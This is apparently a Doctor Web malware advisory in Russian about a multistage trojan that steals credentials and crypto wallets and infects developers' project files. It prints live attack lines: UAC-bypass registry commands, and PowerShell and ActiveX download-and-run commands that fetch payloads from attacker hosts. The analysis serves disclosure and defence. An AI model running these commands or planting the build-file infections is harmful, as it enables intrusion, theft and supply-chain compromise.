Цель – разработчики. Новый троян атакует цепочки поставок и наносит комбинированный ущерб зараженным ПК
«Горячие» новости | Все новости | О вирусах
Первые случаи распространения трояна были зафиксированы в последнем квартале 2025 года, с тех пор он постоянно модифицируется разработчиками. В основном он распространяется по интернету через зараженные .exe и python файлы. Процесс заражения многоступенчатый, разберем протекание каждой стадии и их цели одну за другой.
Стадия 1. Trojan.DownLoader49.35384
Специалисты «Доктор Веб» обнаружили множество зараженных легитимных приложений с похожей структурой. В изначальный исполняемый файл добавлен глобальный объект, а выполнение троянизированного приложения начинается с получения доступа к системным API через метод PEB walking. Далее стандартная функция initterm проходит таблицу указателей функций и инициализирует их, где одна из таких функций является вредоносной и запускает PowerShell команду. В некоторых версиях трояна эта нагрузка хранится в зашифрованном виде.
Запуск через initterm
PowerShell команда скачивает и выполняет вредоносный файл Trojan.DownLoader49.35687, что означает запуск второй стадии.
Вредоносная PowerShell команда
В дополнение к исполняемым файлам были обнаружены файлы на языке Python (Python.Downloader.255). В них тот же вредоносный код был зашифрован с помощью механизма симметричного шифрования Fernet. Он спрятан за простой обфускацией — множеством пробелов в первой строке. В этом случае выполнение также проходит в несколько этапов.
Вредоносные Python файлы
Стадия 2. Trojan.DownLoader49.35687
На этом этапе троян Trojan.DownLoader49.35687 выполняет проверку своего запуска в песочнице. Кроме этого, он создает объект синхронизации mutex c именем Global\PFNMX (фиксированное значение). Пример подобного объекта: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. Таким образом троян проверяет, не запущена ли ранее на компьютере другая копия.
Во время второй стадии троян пытается получить адреса C2 сервера с помощью публичных репозиториев GitHub и игровой платформы Steam. На них злоумышленники оставляют домены, которые троян считывает и использует как URL для загрузки третьей стадии — трояна BackDoor.Siggen2.5906.
Аккаунты Steam, созданные злоумышленниками, содержат название домена в открытом виде.
Аккаунт Steam с C2 доменом
На GitHub злоумышленники сохранили зашифрованный адрес C2 домена в виде raw файла: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Троян загружает этот файл и расшифровывает его сначала через Base64, а затем с помощью операции XOR с ключом ZwFlushKey.
Зашифрованные домены
После скачивания следующей стадии, Trojan.DownLoader49.35687 внедряет ее в процесс одного из 41 заранее указанных исполняемых файлов из C:\Windows\System32.
Адрес домена С2, с которым удалось установить связь, добавляется к прописанным в исходном коде трояна строкам и передается следующей стадии через именованный канал pipe\VccFramework.
Стадия 3. BackDoor.Siggen2.5906
На этой стадии происходит основная вредоносная деятельность. BackDoor.Siggen2.5906 создает объект синхронизации mutex с фиксированным именем вида Global\PFNX_Side (фиксированное значение). Затем через ранее созданный канал троян получает данные от второй стадии, откуда извлекает идентификаторы трояна и домен С2, с которым BackDoor.Siggen2.5906 будет коммуницировать.
Чтобы закрепиться в системе, троян скачивает файл «bungee.boo», который выполняет функции стадии 2 — Trojan.DownLoader49.35687, и подменяет им DLL файлы:
- «profapi.dll» приложения Discord,
- «domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains» приложения Microsoft Edge,
- «C:\Windows\omadmapi.dll».
Дополнительно BackDoor.Siggen2.5906 может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.
Для действий с правами администратора троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.
Стилер
Троян способен красть различную информацию:
- токены Discord, которые позволяют войти в чужие аккаунты без ввода логина/пароля;
- пароли и куки из браузеров Chrome, Edge, Opera, Brave, Yandex и др. Кроме обычных техник извлечения данных, может использовать файл CCCWF.tmp (Trojan.PWS.Siggen5.33623). Он встраивается в браузер, а затем считывает пароли и сохраняет их в текстовые файлы;
- папки Telegram Desktop;
- папки криптокошелька Exodus.
Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL balista[.]lol/Stb/PokerFace/RTApp[.]txt при помощи curl. В подмененной версии в index.js (Trojan.Siggen32.44702) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.
Подмененный файл index.js
Клиппер
Особо опасная функция трояна. ВПО постоянно следит за буфером обмена пользователя: ищет данные банковских карт и отправляет их на сервер злоумышленников. Также вредонос заменяет адреса криптокошельков на подставные, которые получает от C2 сервера.
Бэкдор
Функциональность трояна позволяет злоумышленникам удаленно управлять зараженным ПК с помощью команд:
| exc | скачать файл с url при помощи curl и запустить его |
| RVRS | запустить Reverse Proxy |
| RUNCMD | запустить команду через cmd |
| GETFILE | загрузить содержимое определенного файла на управляющий сервер |
| LISTDIR | отправить список файлов из определенной директории компьютера на управляющий сервер |
| TROLL | запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т. д. |
Майнер
При помощи curl троян скачивает с сервера и запускает файл https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. Своим строением и действиями он похож на стадию 2, только вместо BackDoor.Siggen2.5906 он скачивает и внедряет Trojan.BtcMine.3956. Этот майнер запускается только после определенного периода бездействия пользователя. ВПО использует инструменты XMRig, T-Rex и TeamRedMiner с открытым исходным кодом.
Заражение файлов
Главная отличительная черта этого трояна — заражение файлов и дальнейшее самостоятельное распространение. Список заражаемых файлов:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj и .csproj.
Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://
dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.Злоумышленники строят свой расчет на том, что разработчики будут публиковать свои проекты с вредоносным кодом в открытом доступе. Другие разработчики, которые будут собирать, компилировать или модифицировать проект, автоматически заразят свои компьютеры из-за файлов .suo, .vcxproj и .csproj, а обычные пользователи могут запустить зараженные исполняемые файлы, созданные с помощью скомпрометированных инструментов разработки.
Файл imgui_impl_win32.cpp. Trojan.Loader.3129
Файл imgui_impl_win32.cpp — часть популярной библиотеки Dear ImGui, отвечающей за графический интерфейс для языка программирования С++. Троян внедряет в файл две строки: первая содержит полезную нагрузку, вторая запускает ее.
Строка кода с полезной нагрузкой
Строка кода с запуском пэйлоада
Итог — команда
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }"
Таким образом, библиотека оказывается зараженной и любые созданные пользователем приложения на С++ будут иметь в себе вредоносный код. При передаче или загрузке подобных приложений заражение будет распространяться дальше.
Файлы .suo. Trojan.Loader.3138
Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.
Зараженный файл
В результате при открытии проекта в Visual Studio запускается вредоносный код:
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
Файлы winnetwk.h. Trojan.Loader.3184
Windows SDK — официальный набор инструментов Microsoft, который позволяет создавать приложения для ОС Windows.
С помощью реестра троян находит папку, куда установлен Windows SDK. В этой папке происходит поиск файла winnetwk.h, ответственного за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.
Зараженный файл winnetwk.h
После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код, который запускает стадию 2.
Файлы .exe
Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как Trojan.DownLoader49.35384, он же стадия 1.
Файлы .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)
Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. Ранние версии трояна добавляли код, подобный стадии 1.
Ранняя версия кода
В новых версиях код стал сложнее, появилась дополнительная обфускация.
Новая версия кода
Один из этапов выполнения Trojan.Loader.3128
В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:
- youtu.be/akoxddx6lgc,
- steamcommunity.com/profiles/76561198737324192.
На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64.
YouTube-аккаунт с зашифрованным URL-адресом
После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной со стадией 2.
Описание работы трояна позволяет сделать вывод, что он представляет повышенную опасность из-за комбинирования целого ряда вредоносных функций. Во избежание заражения своего компьютера и дальнейшего распространения трояна рекомендуем регулярно обновлять антивирусные базы и проверять все скачанные из интернета файлы. Пользователи антивируса Dr.Web Security Space и Dr.Web Desktop Security Suite могут быть спокойны, поскольку троян надежно определяется и удаляется антивирусами Dr.Web. Файлы типа .vcxproj, .csproj и imgui лечатся, из них удаляется вредоносный код.
Подробнее об Trojan.DownLoader49.35384
Подробнее об Trojan.DownLoader49.35687
Подробнее об BackDoor.Siggen2.5906
Подробнее об Trojan.BtcMine.3956